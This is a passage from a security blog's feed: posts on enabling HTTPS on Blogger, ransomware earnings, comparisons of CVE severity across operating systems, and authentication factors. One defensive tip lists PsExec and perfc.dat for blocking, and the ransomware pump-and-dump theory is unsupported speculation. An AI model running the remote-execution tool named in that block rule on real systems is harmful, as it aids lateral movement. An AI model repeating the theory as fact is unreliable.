tag:blogger.com,1999:blog-71847183898601274722018-11-01T20:42:58.409+11:00Morgan's Security BlogMorgan Storeyhttp://www.blogger.com/profile/10406049887224934659noreply@blogger.comBlogger36125tag:blogger.com,1999:blog-7184718389860127472.post-58563770868627258232018-03-06T14:01:00.001+11:002018-03-06T15:19:49.738+11:00HTTP is dead, long live HTTPS"FTP is deprecated, HTTP is deprecated, at least it should be now that we have secure replacements"<br /><br />Really not sure where I read that quote. One of the traps of being in the industry so long. It might have been on a security mailing list back in the early naughties. I remember vehemently nodding in agreement... I've been sad for years that my own site was still not running SSL/TLS. I've endeavored a number of times to get it up to HTTPS. But see I am cheap, and I use Bloggers free service for my domain (blogger for your domain), so HTTPS wasn't available.<br />Well it is now, and I thought I'd do a quick how to, for those that also have blogger.<br /><br />It is really simple, like blogger has been for all those years. But it looks to be a beta feature (how long did google stay in beta for...). So you need to visit https://draft.blogger.com. If you are already logged in to blogger, you'll be logged in here too.<br /><br />Now simply click on settings and scroll down to the HTTPS section. Change the first drop-down to: "Yes".<br />Now wait about 20minutes as google generate you a <a href="https://letsencrypt.org/">https://letsencrypt.org</a> certificate and apply it your site. Come back to this section and change the HTTPS redirect to "Yes" as well. And if like me you have multiple blogs, go through each and change them all to the same.<br /><div class="separator" style="clear: both; text-align: center;"><a href="https://4.bp.blogspot.com/-cEp6ox9WBAU/Wp4D8i4e9KI/AAAAAAAAgvM/-wYRdgDrhAEyDDOm-sW5puIHSKFu6icugCLcBGAs/s1600/SSL-Blogger.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="342" data-original-width="745" height="180" src="https://4.bp.blogspot.com/-cEp6ox9WBAU/Wp4D8i4e9KI/AAAAAAAAgvM/-wYRdgDrhAEyDDOm-sW5puIHSKFu6icugCLcBGAs/s400/SSL-Blogger.png" width="400" /></a></div><span id="goog_282141538"></span><span id="goog_282141539"></span><span id="goog_1051197457"></span><span id="goog_1051197458"></span><span id="goog_1922285354"></span><span id="goog_1922285355"></span><br /><span id="goog_282141538">Obviously not a super technical post this time, but good to see even free (as in beer) services get security features of sorts.</span><br /><span id="goog_282141538">Of course, if you have any other kind of hosting, get a letsencrypt cert and use it, the future is encrypted. </span>Morgannoreply@blogger.com0tag:blogger.com,1999:blog-7184718389860127472.post-41554467674495114812017-06-28T19:42:00.000+10:002017-06-29T21:37:40.025+10:00Ransomware to make money?<div class="separator" style="clear: both; text-align: center;"><a href="https://4.bp.blogspot.com/-TYK6Bujjqck/WVTlw6zBteI/AAAAAAAAcHM/3wlVfdp3w0Q9oHOipaqoj5A9bVm4XSTMACLcBGAs/s1600/1rpe1v.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="500" data-original-width="889" height="179" src="https://4.bp.blogspot.com/-TYK6Bujjqck/WVTlw6zBteI/AAAAAAAAcHM/3wlVfdp3w0Q9oHOipaqoj5A9bVm4XSTMACLcBGAs/s320/1rpe1v.jpg" width="320" /></a></div><br />Ransomware can be used to make money, no hear me out. Ransomware as a vector to make money... no it is not what you think.<br />So the latest ransomware(s) are doing the rounds after the horror that was Wannacry, we now have <strike><a href="https://www.bleepingcomputer.com/news/security/petya-ransomware-skips-the-files-and-encrypts-your-hard-drive-instead/">Petya</a> (sorry this went active months ago),</strike> <a href="https://www.itnews.com.au/news/what-you-need-to-know-about-the-petya-notpetya-ransomware-466707">NotPetya </a>and <a href="https://www.digitalxraid.com/goldeneye-ransomware/">GoldenEye </a>all go active overnight. Petya has been around a while but the new ones uses the same vulnerability WannaCry did (EternalBlue), plus they now steal local credentials and re-use them to infect PC's across the network and world that use the same credentials, regardless of their patch level. These viruses have been seen on everything from <a href="https://twitter.com/NewsReport365/status/879712029698912257/photo/1">Point of sale systems in the Ukraine</a> to <a href="http://www.abc.net.au/news/2017-06-28/cadbury-chocolate-factory-targeted-in-ransomware-attack/8658222">chocolate factories</a> (seriously chocolate, do beer next and watch Australians find you, and tear you limb from limb).<br /><br />Anyway, so ransomware often holds your files at ransom by encrypting them with a key only the attackers know. They ransom your files asking for payment in the somewhat untraceable Crypt-currency called bitcoin (BTC). Bitcoin can be traded in online markets for real money. Only issue is, they never get much. You can actually tell by looking at the digital wallets connected to the ransomware (amount as of 28/07);<br /><br /><a href="https://bitref.com/18P63yUwiDMJgKmQ8z6veLs84A67vSScEk">Petya(original from March)</a>&nbsp;&nbsp; .0002btc US$0.50 (FAIL)<br /><a href="https://bitref.com/1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX">NotPetya</a> 3.39btc ~US$9,000<br /><a href="https://bitref.com/17xV74Hp2zNR74yG3AJvPpNMchPJHm2iUo">GoldenEye</a> 0btc US$0 (early days yet, and maybe the same wallet as NotPetya)<br />WannaCry had loads of wallets; <a href="https://bitref.com/12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw">First one</a> 17.5btc ~US$45,000, <a href="https://bitref.com/13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94">Second one</a> 19.75btc ~US$50,000, <a href="https://bitref.com/115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn">third one</a> 14.4btc ~US$36,000. Total of around 150,000 in total earnings. Thanks to <a href="https://twitter.com/actual_ransom">https://twitter.com/actual_ransom</a>.<br /><br />So why do they do this, they don't actually make an amount equal to the development time or disruption they cause. I've thought about this a lot. Surely there are better ways to make money. One virus (<a href="http://www.abc.net.au/news/2017-05-18/adylkuzz-cyberattack-could-be-far-worse-than-wannacry:-expert/8537502">Adylkuzz</a>) was recently found that also used the same vulnerability WannaCry did. However Adylkuzz sat silently on the PC it infected slowly infecting others... and mining a different Crypt-currency called Monero. Now that is a much smarter long term money maker.<br />Proofpoint have a good breakdown of Adylkuzz <a href="https://www.proofpoint.com/us/threat-insight/post/adylkuzz-cryptocurrency-mining-malware-spreading-for-weeks-via-eternalblue-doublepulsar">here </a>and as of the 15th of May, likely only a few weeks into their virus mining crypt-currency, they had around US$50,000. This is important as the mining crypt-currency takes time. Sorry I can't link directly to the wallets, as Monero doesn't work like Bitcoin in this regard. They seem to be using lots of Monero wallets too, so they are likely making a lot more.<br /><br />This mining by malware I thought was an interesting method, though it isn't making them millionaires it is still a slow steady source of money.<br /><br />The Bitcoin wallets used for the ransomware don't seem to make much, not for the effort put in to code and distribute their malware. No the bad guys are performing, I think, a writ-large pump and dump scheme. <br />Bitcoin has gone from around US$500 a year ago to US$2500 as of writing this. It is slated to get to US$5000 by end of year. In fact if you look at the spikes they have almost always coincided with ransomware releases, some spikes have gone before the malware hit, perhaps indicating a buying frenzy of knowledgeable parties.<br /><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://2.bp.blogspot.com/-Eolrt08JB2U/WVMoazHwXEI/AAAAAAAAcFc/LybxZ-HWufMoIrhvcmmI8qFOX4NuwDFxgCLcBGAs/s1600/CoinDesk.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="556" data-original-width="903" height="197" src="https://2.bp.blogspot.com/-Eolrt08JB2U/WVMoazHwXEI/AAAAAAAAcFc/LybxZ-HWufMoIrhvcmmI8qFOX4NuwDFxgCLcBGAs/s320/CoinDesk.png" width="320" /></a></div><div style="text-align: center;"><span style="font-size: xx-small;"><i>Care of <a href="http://www.coindesk.com/price/">Coindesk</a></i></span></div><br />Combine this with some companies speculatively buying bitcoin in case they get ransomware (as reported on the <a href="https://risky.biz/">risky business</a> podcast), and other people buying simply due to the value increasing and you have yourself a criminal led massive pump and dump scam.<br />The criminals probably bought and mined bitcoin years ago, and are sitting on it. They then pump the demand and thus the price up by doing these virus releases, selling them as ransomware as a service to unsuspecting clients... then the price rises and rises... then they sell out all their bitcoin. The market crashes... but they have millions. Better yet their bitcoin wallets are not in anyway related to the ransomware transactions so it becomes difficult to catch them, apart from the usual untraceable nature of bitcoin transactions.<br /><br />So there you have it, don't play into their game... maybe, or if you do jump out before the bad guys dump out and kill the market, good luck with that.<br /><br />Oh and protect yourself from this an all other ransomware by doing backups, not opening files from people you don't know, removing admin rights, making the admin password unique per machine, and maybe even rolling app white-listing into your environment.<br /><br />In this particular instance;<br /><a href="https://twitter.com/mrjefftang/status/879781672794939397">Patch</a> WindowsXP+ against <a href="https://technet.microsoft.com/en-us/library/security/ms17-010.aspx">MS17-010</a><br />Create the file c:\windows\perfc as per <a href="https://twitter.com/threatintel/status/879821695292276736">this</a><br />The <a href="https://www.microsoft.com/en-us/download/details.aspx?id=46899">LAPS </a>tool from is free from MS and should be investigated and used to ensure unique passwords on all domain joined computers.<br />Add perfc.dat and PSEXEC.EXE to your app whitelisting to be denied as per <a href="https://twitter.com/HackingDave/status/879779361364357121">https://twitter.com/HackingDave/status/879779361364357121 </a>Morgannoreply@blogger.com0tag:blogger.com,1999:blog-7184718389860127472.post-51884716494921336562016-01-16T00:19:00.002+11:002016-01-16T00:19:25.783+11:002015 Vulnerabilities - Android VS IOS (iPhone OS)This is the second post on from <a href="http://security.morganstorey.com/2016/01/2015-vulnerabilities-windows7-vs-macosx.html">http://security.morganstorey.com/2016/01/2015-vulnerabilities-windows7-vs-macosx.html</a><br /><br />I was sent this interesting article; <a href="http://venturebeat.com/2015/12/31/software-with-the-most-vulnerabilities-in-2015-mac-os-x-ios-and-flash/">http://venturebeat.com/2015/12/31/software-with-the-most-vulnerabilities-in-2015-mac-os-x-ios-and-flash/</a><br /><br />So I hate Apple, but in the last analysis I did I found that OSX wasn't actually that bad compared to Microsofts most popular OS at the moment Windows7, I would have to say on par, go to the link at the top to read this. This time I am similarly analysing <a href="http://www.cvedetails.com/vulnerability-list/vendor_id-1224/product_id-19997/year-2015/Google-Android.html">Google's Android </a>and <a href="http://www.cvedetails.com/vulnerability-list/vendor_id-49/product_id-15556/year-2015/Apple-Iphone-Os.html">Apple's iPhone OS(IOS</a>).<br />Now to precursor this, I am almost an Android fanboi, I have android tablets (4 at last count, 3 from dx.com that all died), and my although my first smartphone was Symbian, all since have been Android. My kids do have iPads and my wife does have an iPhone though, but this is more for the apps available. There are things on both platforms that I wish the other would do, but Android is far and away more flexible, but like last time... don't get me started on my Apple-hate.<br /><br />Now onto the Andorid/IOS analysis, as I started with MS last time, I'll start with Android this time.<br /><br /><a href="http://www.cvedetails.com/vulnerability-list/vendor_id-1224/product_id-19997/year-2015/Google-Android.html">Google's Android </a>(as opposed the Motorola version that is listed at CVEDetails) had 130 vulnerabilities in 2015. With an average across those vulnerabilities of 8.37 (seems a bit high), standard deviation was 2.23. If we then round all the scores (down if they are .4 and below, up if they are .5 and above we get the below);<br /><br /><br /><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-6eq4rd8kGx8/Vph2VclzWiI/AAAAAAAAT-Q/TKquTwZgFX4/s1600/Andorid2015.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="171" src="http://3.bp.blogspot.com/-6eq4rd8kGx8/Vph2VclzWiI/AAAAAAAAT-Q/TKquTwZgFX4/s320/Andorid2015.png" width="320" /></a></div>This shows there are an awful lot of vulnerabilities ranked at the ominous CVSS score of 10. Not many of these are going to be third party vendors as they don't really allow third party code to hook into the OS like desktop OS's. <br />But I did find the almost obligatory Adobe Flash vulnerabilities in there. 21 of the 61 CVSS 10's were flash, good thing Google dropped it from their 4.1 (KitKat) release of the OS... an OS released <a href="http://www.pcadvisor.co.uk/review/operating-systems-software/android-41-jelly-bean-review-3367078/">4 and a half years ago</a>. So I don't think these should be included, still an awful lot of CVSS score 10's lets look at some.<br /><br />In case you didn't know this is the decade where security researchers learned some marketing, and started to brand their discoveries with cool names and logos like <a href="http://heartbleed.com/">heartbleed</a>. Well <a href="http://www.smh.com.au/it-pro/security-it/scary-android-stagefright-bug-affects-14-billion-20151006-gk23kt.html">Stagefright</a> was a bug of this ilk that was actually a big deal on Android. Patched no less than 38 times, of these 49 <br /><br />With words like libstagefright (where the bug got its name), MPEG4Extractor, Skia, Sonivox and mediaserver these are all related to stagefright, in fact of the CVSS 10 bugs remaining after Adobe and Stagefright there seems to be only one <b>CVE-2015-1474.</b><br />Here are<b> </b>two examples of some obscurely described but Stagefright related bugs;<br /><br /><b>CVE-2015-6609</b><br /><i>libutils in Android before 5.1.1 LMY48X and 6.0 before 2015-11-01 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted audio file, aka internal bug 22953624.</i><br /><br /><b>CVE-2015-3836</b><br /><i>The Parse_wave function in arm-wt-22k/lib_src/eas_mdls.c in the Sonivox DLS-to-EAS converter in Android before 5.1.1 LMY48I does not reject a negative value for a certain size field, which allows remote attackers to execute arbitrary code or cause a denial of service (buffer overflow) via crafted XMF data, aka internal bug 21132860.</i><br /><br />Interestingly three CVE-2014's (7915, 7916 and 7917) exist on this list, all related to stagefright. I believe these CVE id's were allocated prior to the bugs disclosure. <br /><br />So the only non-Adobe, non-stagefright bug was;<br /><b>CVE-2015-1474</b><br /><i>Multiple integer overflows in the GraphicBuffer::unflatten function in platform/frameworks/native/libs/ui/GraphicBuffer.cpp in Android through 5.0 allow attackers to gain privileges or cause a denial of service (memory corruption) via vectors that trigger a large number of (1) file descriptors or (2) integer values.</i>A pretty nasty one, allows a malicious app to escalate its privileges via the graphic buffer, though not remote exploitation. Essentially if a user installs a dodgy app they could give a bad guy access to more than they should.<br /><br />Pretty sure all those Adobe bugs shouldn't be in there to be fair. And they probably should have fixed the stagefright bug in one go, but I guess it was a pervasive library, hence all the issues found and fixed.<br />Stagefright was pretty bad, it essentially meant with the right media file (audio on a webpage for example or the proof of concept <a href="http://www.enterprise-security-today.com/news/Android-Exploit-Released-in-the-Wild/story.xhtml?story_id=102009XSDJEO">MMS attachment</a>), it could get your phone to run a command. So it is remote code execution, the ultimate vulnerability for any OS. But it was specific, you needed to know the app the user was opening your media file in, to be sure it used the library. I think it does deserve the CVSS score of 10, not sure about the adobe ones though seeing as most androids don't run it anymore.<br /><br />******************************************<br />On to iPhone OS (IOS)<br /><br /><a href="http://www.cvedetails.com/vulnerability-list/vendor_id-49/product_id-15556/year-2015/Apple-Iphone-Os.html">IOS </a>had a whopping 375 vulnerabilities last year. With a much lower average than Andorids at 6.13 (versus Android 8.37). It's standard deviation was also smaller at 1.82. This is probably due to the 61 CVSS 10's that android had. Lets have a look at the graph;<br /><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/--Xnx1Jm91ck/Vpiov7JJ-FI/AAAAAAAAT-g/E8pNu3Upl7k/s1600/IOS2015.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="164" src="http://2.bp.blogspot.com/--Xnx1Jm91ck/Vpiov7JJ-FI/AAAAAAAAT-g/E8pNu3Upl7k/s320/IOS2015.png" width="320" />&nbsp;</a></div><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: left;">Interestingly there are a tonne of CVSS 7's there, a lot of those were a vulnerability in Webkit (Apple Safari) that allowed a remote attacker to crash the app with a specially crafted website. I am sure this probably allows the attacker to run code too, so it should probably be higher... Most denial of services if done right end in compromise, but anyway.<br /><br />I'll have a look at some of the more interesting CVSS 10 rated vulnerabilities.</div><div class="separator" style="clear: both; text-align: left;"><br /><b>CVE-2015-6988</b></div><div class="separator" style="clear: both; text-align: left;"><i>The kernel in Apple iOS before 9.1 and OS X before 10.11.1 does not initialize an unspecified data structure, which allows remote attackers to execute arbitrary code via vectors involving an unknown network-connectivity requirement.</i></div>This one looks particularity nasty, and also affected OSX and I mentioned it in the other post. Definitely worthy of its 10 score. On a mobile this could be very bad if the "unknown network-connectivity" included something sent over say the GSM cellular network.<br /><br /><b>CVE-2014-4495</b><i><br />The kernel in Apple iOS before 8.1.3, Apple OS X before 10.10.2, and Apple TV before 7.0.3 does not enforce the read-only attribute of a shared memory segment during use of a custom cache mode, which allows attackers to bypass intended access restrictions via a crafted app.</i><br />This one I didn't mention in the other post, but it isn't that bad. It essentially allows an application already on the phone or Mac to read memory it shouldn't be able to, this could allow this app to escalate permissions or disable some other security measure. I'd give this a solid 9, but 10 seems high.<br /><br /><b>CVE-2014-4480</b><br /><i>Directory traversal vulnerability in afc in AppleFileConduit in Apple iOS before 8.1.3 and Apple TV before 7.0.3 allows attackers to access unintended filesystem locations by creating a symlink.</i><br />This one seems to be IOS/AppleTV only, which is interesting. Accessing locations just by creating a symlink is pretty cool. Not remotely exploitable, but could help out a bad guy already on a system. Again I don't think it is a 9, perhaps marked too harsh.<br /><br /><b>Conclusion</b><br />As with the other post, even though IOS has more bugs than Android, it isn't the number of bugs that matter so much, it is type and quality. Android has a higher average and a lot more rated 10's, with this all in account it is a pretty even match. <br />Yes Safari is insecure, stagefright was a big stuff up, flash and reader are terrible, but the OS's themselves seem to be pretty much on par.<br /><br />Thanks to CVEdetails for their site and access to the list of vulnerabilities. The compiled spreadsheet is <a href="https://drive.google.com/file/d/0B3nPlpqRXD2oQ2dHVlJ2aUZUQlU/view?usp=sharing">here</a>, under fair use.<br />Morgannoreply@blogger.com0tag:blogger.com,1999:blog-7184718389860127472.post-86905279107065747072016-01-15T20:30:00.000+11:002016-01-16T00:19:54.234+11:002015 Vulnerabilities - Windows7 VS MacOSXI was sent this interesting article; <a href="http://venturebeat.com/2015/12/31/software-with-the-most-vulnerabilities-in-2015-mac-os-x-ios-and-flash/">http://venturebeat.com/2015/12/31/software-with-the-most-vulnerabilities-in-2015-mac-os-x-ios-and-flash/</a><br /><br />Yes it does appeal to an existing bias I have; APPLE BAD, everything else (except adobe) good. I really hate Apple, but don't get me started.<br /><br /><br />I had a look at this article and like it on the outset, but thinking about it I don't agree with it for a few reasons. There is likely a lot of crossover between OSX and the iPhoneOS, between AIR SDK and AIR itself (it is odd that they list the Air SDK &amp; Compiler separately). <br />There is also the issue of simply counting vulnerabilities as a measure of badness. One vulnerability doesn't equal another, if one of those vulnerabilities allows a bad guy to remotely take control of your computer and the other simply allows them to crash your browser, then the first is much worse.<br /><br />So I thought I would do a more detailed analysis to see what is up and maybe confirm my hatred that Apple is terrible.<br /><br />The <a href="http://www.cvedetails.com/">CVEdetails</a> site gives each vulnerability a score (CVSS), from 0 being minor/non-existent issue to 10 being a critical issue. I decided to show a different side of that article. One that would show the scores more importantly and thus give us the OS with the worse security score. I will focus on OSX and Windows7 to narrow the field. I'll do Android and iPhone OS in the next blog post.<br /><br />Microsoft had 147 vulnerabilities last year all up for <a href="http://www.cvedetails.com/vulnerability-list/vendor_id-26/product_id-17153/year-2015/Microsoft-Windows-7.html">Windows 7</a>, with an average across those vulnerabilities of a score of 6.84. If we then round all the scores (down if they are .4 and below, up if they are .5 and above we get the below);<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-YI0c745b3wM/VpXbs0_2C_I/AAAAAAAAT8Q/PyzazUE59RQ/s1600/Win7-2015.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="217" src="http://4.bp.blogspot.com/-YI0c745b3wM/VpXbs0_2C_I/AAAAAAAAT8Q/PyzazUE59RQ/s320/Win7-2015.png" width="320" /></a></div><br /><br />Let's look at these vulnerabilities that scored 10.<br /><b><br />CVE-2015-0014</b> <br /><i>Buffer overflow in the Telnet service in Microsoft Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, and Windows Server 2012 Gold and R2 allows remote attackers to execute arbitrary code via crafted packets, aka "Windows Telnet Service Buffer Overflow Vulnerability."</i><br />An interesting vulnerability, but not many people should be running telnet on their windows7 PC, let alone then exposing this to the internet.<br /><br /><b>CVE-2015-1635</b> <br />Was a bad one, that allowed you to crash a webserver, though the IIS on windows 7 doesn't run as a <a href="https://www.iis.net/learn/extensions/introduction-to-iis-express/iis-75-express-readme">service</a> and is <a href="https://msdn.microsoft.com/en-us/library/cc268241.aspx">connection limited</a> at windows XP's IIS and Windows Vista IIS was.<br /><br /><b>CVE-2015-2373</b><br />Essentially allows an attacker to execute code on your machine via a vulnerability in remote desktop, not likely that this is enabled through your router, but it is an issue for a malicious insider as it is enabled by default to some extent in corporate environments.<br /><br />I don't think these vulnerabilities should all be 10 (say 9.x?). Yes they allow a remote attacker to take control, but they require a kind of perfect storm. They require the Windows7 machine to have these services enabled (Telnet and IIS are not installed by default, RDP is installed but disabled), and if the attacker is on the internet these also need to be open on the victims router/firewall, or an attack chained to include attacking the UPNP natting that some home routers do.<br /><br />****************************************<br /><br />Now lets look at Apple's MACOSX. <br /><br /><a href="http://www.cvedetails.com/vulnerability-list/vendor_id-49/product_id-156/year-2015/Apple-Mac-Os-X.html">OSX </a>had 384 vulnerabilities in 2015, with a lower average than Microsoft at 6.76. This is likely due to their being more vulnerabilities reported. It could also be that Microsoft seemingly score and report their own vulnerabilities and thus are harsher on themselves. There is also the issue that a lot of the OSX vulnerabilities are due to included open source software and thus these libraries etc get reported by their maintainers (ag Apache, PHP etc). Some of the higher rated vulns I noticed where Apple only, and only reported on their support pages or lists.<br />If we do the same breakdown as before we get the below;<br /><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-dvkFF7EYdVQ/VpbciC-NPgI/AAAAAAAAT9Q/30YTzNonyxo/s1600/OSX.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="171" src="http://3.bp.blogspot.com/-dvkFF7EYdVQ/VpbciC-NPgI/AAAAAAAAT9Q/30YTzNonyxo/s320/OSX.png" width="320" /></a></div>Looking at that we can see there are simply so many more 7, 4 and 5 rated vulnerabilities, which is what brought the average down. I had a look at the standard deviations using the excel STDEV and the full population STDEVP functions, and they are pretty close. MS at 2.43 and OSX at 2.04.<br /><br />Having a look at a samples of the CVSS 10's there is a bit of a difference.<br /><br /><br /><table border="0" cellpadding="0" cellspacing="0" style="width: 98px;"><colgroup><col width="98"></col></colgroup><tbody><tr height="20"> <td height="20" style="height: 15.0pt; width: 74pt;" width="98"><b>CVE-2015-7071</b></td></tr></tbody></table><i>"The File Bookmark component in Apple OS X before 10.11.2 allows attackers to bypass a sandbox protection mechanism for app scoped bookmarks via a crafted pathname."</i><br />This one sounds worse than any of the vulnerabilities that scored 10 on windows, essentially allowing an attacker to bypass protections via a bookmark, bookmarks can be created by running some javascript on a site that the user visits, pretty bad.<br /><br /><br /><b>CVE-2015-6988 </b><br /><i>The kernel in Apple iOS before 9.1 and OS X before 10.11.1 does not initialize an unspecified data structure, which allows remote attackers to execute arbitrary code via vectors involving an unknown network-connectivity requirement.</i><br />OK, this one is pretty bad too, allowing an attacker to execute code remotely.<br /><br /><b>CVE-2015-5887</b><br />This one is a TLS/SSL bug, probably a flow on from SSL bugs found in 2015 in open source libraries and in closed sourced ones such as the Windows bug CVE-2015-6112, and CVE-2015-1637. Though I note both these windows bugs had much lower CVSS scores of 5.8 and 4.3 respectively.<br /><br /><br /><b>CVE-2015-1131</b><br />A bug in an Apple font library, essentially allowing remote code if the font is called in a specific way, say from a webpage. Similar to the much lower rated CVE-2015-0059 Windows 7 bug.<br /><br />Then there are a few bugs in drivers for apple hardware, Bluetooth, IOAceelerator (seems to be a ram disk card not likely found in most macs), a couple pretty bad kernel bugs and some HID driver bugs.<br /><br /><u><b>But </b></u>then, looking at the rest of the 10 rated bugs, a pattern emerges. 27 of the CVSS rated 10's are actually ADOBE bugs in Acrobat/PDF reader... yikes. See the below example;<br /><br /><table border="0" cellpadding="0" cellspacing="0" style="width: 98px;"><colgroup><col width="98"></col></colgroup><tbody><tr height="20"> <td height="20" style="height: 15.0pt; width: 74pt;" width="98"><b>CVE-2015-3074</b></td></tr></tbody></table>Adobe Reader and Acrobat 10.x before 10.1.14 and 11.x before 11.0.11 on Windows and OS X allow attackers to bypass intended restrictions on JavaScript API execution via unspecified vectors, a different vulnerability than CVE-2015-3060, CVE-2015-3061, CVE-2015-3062, CVE-2015-3063, CVE-2015-3064, CVE-2015-3065, CVE-2015-3066, CVE-2015-3067, CVE-2015-3068, CVE-2015-3069, CVE-2015-3071, CVE-2015-3072, and CVE-2015-3073.<br /><br />I don't think it is fair that these Adobe bugs are rated 10 for Apple when they aren't even listed on the Windows7 list as they are a third party bug.<br />Some of the other 10 rated bugs also reference OSX's app store. Apps that install from their app store install into a permissions based Jail, essentially protecting the rest of the system from this app. The bugs that were found allowed these apps to break out of this jail... But Windows7 doesn't have this feature for their stores apps so an app installs in whatever context the user is running as (run everything as admin and the app you install can get admin privileges), so really although this is a bug, it is not as bad as simply not even having that protection.<br /><br />MS has an appstore in Windows8 and above... and for a time it was so <a href="http://www.howtogeek.com/194993/the-windows-store-is-a-cesspool-of-scams-why-doesnt-microsoft-care/">horrible </a>that I would advise against using it for the foreseeable future.<br /><b><br />Conclusion</b><br /><br />As much as I hate to admit it, MacOSX having more bugs doesn't mean anything, it isn't the number but the quality. Macos had more, yes, but other than that one bookmark bug a lot of them were actually third party code or code that was not likely to be exploited. The Windows7 CVSS 10 bugs weren't that bad either, not too many will have these exposed to the internet, and inside networks all bar the RDP bug will likely not be installed on 99% of machines. I think we would find if Apple ditch support for natively updating Adobe and other third party software then their number of bugs would drop dramatically, account for their supporting directly all their hardware and you can count for the disparity on numbers of bugs.<br />There is more analysis that could be done here too (I will post the Spreadsheet I used in the next post), perhaps MacOSX had more bugs as more were reported, more were actioned and more were reported publicly to open source software library mailing lists were they would make their way to the media and Apple would be red-faced if they didn't jump on patching them. Perhaps MS was scoring their bugs harsher than they needed to be, and submitters of the open source software bugs in MacOSX were scoring their bugs softer due to their bias to support their own code.<br /><br />Security wise I would say they are actually neck and neck, which is I suppose a good place to be for security at large. Not good for Apple-bashers like me, but I will admit when Apple does good things.<br /><br />On to the CVSS scores, I don't think they are doing it right. They shouldn't be giving an optional disabled by default service like Telnet, or an obscure and I assume non-loaded driver like the IOAccelerator on Apple a score of 10. Sure it allowed remote exploitation, but how likely is it. They should probably put these at &lt;9.5, then they are still critical, but this score doesn't black eye the vendor so much. Next they really shouldn't include third party software in one listing and not in the other, you can't compare the two this way it is an (ahem) Apples verse oranges issue.Morgannoreply@blogger.com0tag:blogger.com,1999:blog-7184718389860127472.post-74393107248475074952015-05-20T20:30:00.000+10:002015-11-25T15:25:37.381+11:00Disrupting the paradigmNot sure if I am quoting here, but be careful when someone says they are disrupting the paradigm, often when you look beneath the vale you will find an issue. The paradigm is usually there for a reason, cause it works.<br /><br />I have discussed factorisation of authentication before <a href="http://security.morganstorey.com/2012/11/15-factor-authentication.html">here</a>, this one will be a little more indepth;<br /><br /><br />To reiterate authentication currently works under a model of factors. Factors are simply classifications of <b>things, in a cumulative manner</b>. Things could be something you know (and preferably keep private), something you have, something you are, somewhere you are. This is 4 factors.<br /><br /><b>Something you know;</b> Pin, password, passcode, passphrase, pictures in a certain order, last 4 digits of a credit card (even though this is something you have, it is a known never changing string).<br /><br /><b>Something you have;</b> a key, a key-card, usb fob, Certificate, smart-card, rfid chip, SMS/Phone call receiving phone, Bluetooth paired phone or other device, laptop, tablet, phone itself.<br /><br /><b>Something you are; </b>fingerprint, iris scan, voiceprint, DNA sequence.<br />I will rant on biometrics later, but you can't re-issue a fingerprint so if it gets compromised and copied by someone you are out of luck.<br /><br /><b>Somewhere you are; </b>GPS location, IP-gelocation (thou as this would be in band checked on the connection you may be using to access the service the security doesn't increase), a landline or mobile phone could also be somewhere you are, eg you login to an app and it calls you on a separate phone at that same location to ensure you meant to.<br /><br />Lets look at some examples.<br /><ul><li>You login to your computer with a username and password, this is <b>1 factor</b> of authentication, just a password.</li><li>You login to your computer with a username and password, then onto a super-secret corporate system with a different username and password, this is still <b>1 factor</b> of authentication. You only used a username and password.</li><li>You login to your PC using a swipe card only, this is still <b>1 factor</b> of authentication.Yes you used something you have, but it was not cumulative on something you know.</li><li>You login to your PC using your username, password and Secure USB key, this is now <b>2 factors</b> of authentication, something you know and something you have.</li><li>You login to your PC using your username, password, thumbprint and Secure USB key, this is now <b>3 factors</b> of authentication; something you know, something you have and something you are. </li><li>You login to your netbanking via their app with username, password, fob token code, and your thumbprint on the home button. The app has rights to your phones GPS, it disallows transfers over $1000 from anywhere but inside your own home or registered place of work, if you go to transfer $1001 to another account and it then allows you due to the registered GPS, this could be considered <b>4 factors</b> of authentication; something you know, have, are, and somewhere you are, all checked to ensure valid authorization.</li></ul>Now comes the paradigm shifting. I wish it was me that thought of these.<br /><br /><b>Device profiling</b><br />This makes the device a factor, specifically a second factor. <br />This will do things like take the IP you are logging in from weighted with things like browser headers and put them in a database, if sees these to dramatically change it can deny you access.<br />A good example shoring the power of this hidden data that you send can be seen at the EFF's Panotoclick here; <a href="https://panopticlick.eff.org/">https://panopticlick.eff.org/</a><br />There are certain banking and social media apps that do this already, alerting you via email when you have logged in from a new device. <br /><br /><br /><b>Risk based authentication</b><br />Awesome idea, basically the application has some smarts. Similar to the above device profiling it does some device profiling and then if you fail it, it either challenges you for more authentication or simply denies you access. It has risk scores that it assigns to things, so risk +1 if you are logging in at a different time, risk +9000 if you are logging in from a country with a bad reputation that you have never logged in from before. This still works in the factorising model, but doesn't force a user to enter every-factor every time, it is an extension of the paradigm.<br /><br /><b>Pingrid and their ilk</b><br />As I mentioned last time, these aren't two factor. They are a challenge, with a user response based on something they know. Interestingly I think they do increase security, but still not as much as a second factor. This really doesn't fit the factorised model. See there demo here; <a href="https://www.winfrasoftbank.com/MyAccounts/Default.aspx">https://www.winfrasoftbank.com/MyAccounts/Default.aspx</a><br />You can see how due to the randomness of the numbers it does reduce the likelihood that the users "password" will ever be compromised by an over the shoulder or man in the middle attack, but again repeat enough views of the users login through a screen scraper and you have them. Still doesn't stop Man in the browser attacks (where malicious code waits for you to authenticate to your bank then distracts you and gives control of that tab to the 